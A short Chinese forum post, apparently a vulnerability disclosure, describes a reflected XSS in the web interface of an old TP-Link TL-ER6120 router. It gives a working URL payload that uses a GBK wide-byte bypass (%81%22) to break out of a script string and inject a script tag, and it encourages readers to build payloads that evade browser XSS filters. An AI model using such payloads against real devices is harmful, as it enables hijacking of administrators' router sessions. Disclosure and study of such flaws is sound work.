TP-Link路由器 反射xss一枚
这个是针对老版的tp-link,当前软件版本: 1.2.1 Build 20130604 Rel.31975
当前硬件版本: TL-ER6120 v1.0
我觉得要换路由器了 – - 这路由器太老了
对于那种需要401认证输入密码的 就不行
进个网站,路由器限制了
<script language=JavaScript>
var OptValue = new Array(
"www.baidu.com",
"",
0,
0,0 );
</script>
由图片可以看出字符编码为GBK,你懂的,宽字节绕过
地址栏输入 %81%22 即可闭合双引号。接下来你懂的
测试浏览器 firefox
http://192.168.0.1/userRpm/AdCastWebsiteNotice.htm?orgUrl=%81%22%29;%3C/script%3E%3Cscript%3Ealert%28%27Leesec%27%29;%3C/script%3E
IE 和 GOOGLE浏览器有XSS Filter,大家可以自己构造XSS代码,绕过XSS Filter,进行攻击
页:
[1]